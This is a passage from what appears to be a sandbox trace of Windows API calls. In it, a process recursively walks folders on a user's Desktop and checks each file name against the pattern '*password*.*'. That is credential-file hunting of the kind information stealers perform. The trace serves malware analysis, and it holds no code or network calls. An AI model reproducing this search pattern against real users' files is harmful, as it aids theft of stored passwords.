cbMultiByte=13, lpWideCharStr=0x3970560, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.963] PathMatchSpecW (pszFile="LQQ8KQ8OZpD-.wav", pszSpec="*password*.*") returned 0 [0110.963] FindNextFileW (in: hFindFile=0x743720, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQEQQujqhNYM", cAlternateFileName="UQEQQU~1")) returned 1 [0110.963] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.963] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7437a0 [0110.964] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.964] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.964] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.964] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13220d0, ftCreationTime.dwHighDateTime=0x1d79ffb, ftLastAccessTime.dwLowDateTime=0xb8ee8eb0, ftLastAccessTime.dwHighDateTime=0x1d7a126, ftLastWriteTime.dwLowDateTime=0xb8ee8eb0, ftLastWriteTime.dwHighDateTime=0x1d7a126, nFileSizeHigh=0x0, nFileSizeLow=0x16d3e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LlE7.doc", cAlternateFileName="")) returned 1 [0110.964] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", cchWideChar=58, lpMultiByteStr=0x29a2a08, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", lpUsedDefaultChar=0x0) returned 58 [0110.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=13, lpWideCharStr=0x39703a8, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.964] PathMatchSpecW (pszFile="LlE7.doc", pszSpec="*password*.*") returned 0 [0110.964] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4773fc0, ftCreationTime.dwHighDateTime=0x1d7ab51, ftLastAccessTime.dwLowDateTime=0xfbe70ad0, ftLastAccessTime.dwHighDateTime=0x1d7ab5d, ftLastWriteTime.dwLowDateTime=0xfbe70ad0, ftLastWriteTime.dwHighDateTime=0x1d7ab5d, nFileSizeHigh=0x0, nFileSizeLow=0x1566b, dwReserved0=0x0, dwReserved1=0x0, cFileName="s ICeshe.bmp", cAlternateFileName="SICESH~1.BMP")) returned 1 [0110.964] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0110.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", cchWideChar=62, lpMultiByteStr=0x29a28e8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\s ICeshe.bmp", lpUsedDefaultChar=0x0) returned 62 [0110.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=13, lpWideCharStr=0x3970650, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.964] PathMatchSpecW (pszFile="s ICeshe.bmp", pszSpec="*password*.*") returned 0 [0110.964] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 1 [0110.964] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", cchWideChar=59, lpMultiByteStr=0x29a2ed0, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\sQpxS.csv", lpUsedDefaultChar=0x0) returned 59 [0110.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=13, lpWideCharStr=0x3970560, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.965] PathMatchSpecW (pszFile="sQpxS.csv", pszSpec="*password*.*") returned 0 [0110.965] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 0 [0110.965] FindClose (in: hFindFile=0x7437a0 | out: hFindFile=0x7437a0) returned 1 [0110.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", cchWideChar=49, lpMultiByteStr=0x38ea218, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpUsedDefaultChar=0x0) returned 49 [0110.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x39706c8, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.965] PathMatchSpecW (pszFile="UQEQQujqhNYM", pszSpec="*password*.*") returned 0 [0110.965] FindNextFileW (in: hFindFile=0x743720, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 1 [0110.965] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.965] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743860 [0110.965] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.965] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.965] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.965] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67bd380, ftCreationTime.dwHighDateTime=0x1d7ab0a, ftLastAccessTime.dwLowDateTime=0x1a731140, ftLastAccessTime.dwHighDateTime=0x1d7ad95, ftLastWriteTime.dwLowDateTime=0x1a731140, ftLastWriteTime.dwHighDateTime=0x1d7ad95, nFileSizeHigh=0x0, nFileSizeLow=0xa5ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="aQrMbJ6CFhwhf7PNnuMu.docx", cAlternateFileName="AQRMBJ~1.DOC")) returned 1 [0110.965] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0110.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", cchWideChar=76, lpMultiByteStr=0x38eae18, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", lpUsedDefaultChar=0x0) returned 76 [0110.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=13, lpWideCharStr=0x3970358, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.966] PathMatchSpecW (pszFile="aQrMbJ6CFhwhf7PNnuMu.docx", pszSpec="*password*.*") returned 0 [0110.966] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2615710, ftCreationTime.dwHighDateTime=0x1d7aff0, ftLastAccessTime.dwLowDateTime=0xec0a4a10, ftLastAccessTime.dwHighDateTime=0x1d7aff3, ftLastWriteTime.dwLowDateTime=0xec0a4a10, ftLastWriteTime.dwHighDateTime=0x1d7aff3, nFileSizeHigh=0x0, nFileSizeLow=0x155c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ge40CUtwTNBApkxPnR.png", cAlternateFileName="GE40CU~1.PNG")) returned 1 [0110.966] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0110.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", cchWideChar=73, lpMultiByteStr=0x38eae18, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", lpUsedDefaultChar=0x0) returned 73 [0110.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=13, lpWideCharStr=0x3970588, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.966] PathMatchSpecW (pszFile="ge40CUtwTNBApkxPnR.png", pszSpec="*password*.*") returned 0 [0110.966] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b17880, ftCreationTime.dwHighDateTime=0x1d7ad02, ftLastAccessTime.dwLowDateTime=0xd0a9b460, ftLastAccessTime.dwHighDateTime=0x1d7ae48, ftLastWriteTime.dwLowDateTime=0xd0a9b460, ftLastWriteTime.dwHighDateTime=0x1d7ae48, nFileSizeHigh=0x0, nFileSizeLow=0x8a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QXzQAUh0jIi.bmp", cAlternateFileName="QXZQAU~1.BMP")) returned 1 [0110.966] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0110.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", cchWideChar=66, lpMultiByteStr=0x39700d0, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", lpUsedDefaultChar=0x0) returned 66 [0110.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=13, lpWideCharStr=0x3970628, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.966] PathMatchSpecW (pszFile="QXzQAUh0jIi.bmp", pszSpec="*password*.*") returned 0 [0110.966] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 1 [0110.966] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0110.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", cchWideChar=63, lpMultiByteStr=0x29a28e8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", lpUsedDefaultChar=0x0) returned 63 [0110.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=13, lpWideCharStr=0x3970650, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.968] PathMatchSpecW (pszFile="YzBjdPQG.jpg", pszSpec="*password*.*") returned 0 [0110.968] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 0 [0110.968] FindClose (in: hFindFile=0x743860 | out: hFindFile=0x743860) returned 1 [0110.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=13, lpWideCharStr=0x39706f0, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.969] PathMatchSpecW (pszFile="_5VgSE0-6jvrM", pszSpec="*password*.*") returned 0 [0110.969] FindNextFileW (in: hFindFile=0x743720, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 0 [0110.969] FindClose (in: hFindFile=0x743720 | out: hFindFile=0x743720) returned 1 [0110.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0110.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=13, lpWideCharStr=0x3970628, cchWideChar=13 | out: lpWideCharStr="*password*.*") returned 13 [0110.969] PathMatchSpecW (pszFile="KTOu", pszSpec="*password*.*") returned 0 [0110.969] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59203b50, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0x89c45de0, ftLastAccessTime.dwHighDateTime=0x1d7aeaa, ftLastWriteTime.dwLowDateTime=0x89c45de0, ftLastWriteTime.dwHighDateTime=0x1d7aeaa, nFileSizeHigh=0x0, nFileSizeLow=0xac61, dwReserved0=0x0, dwReserved1=0x0, 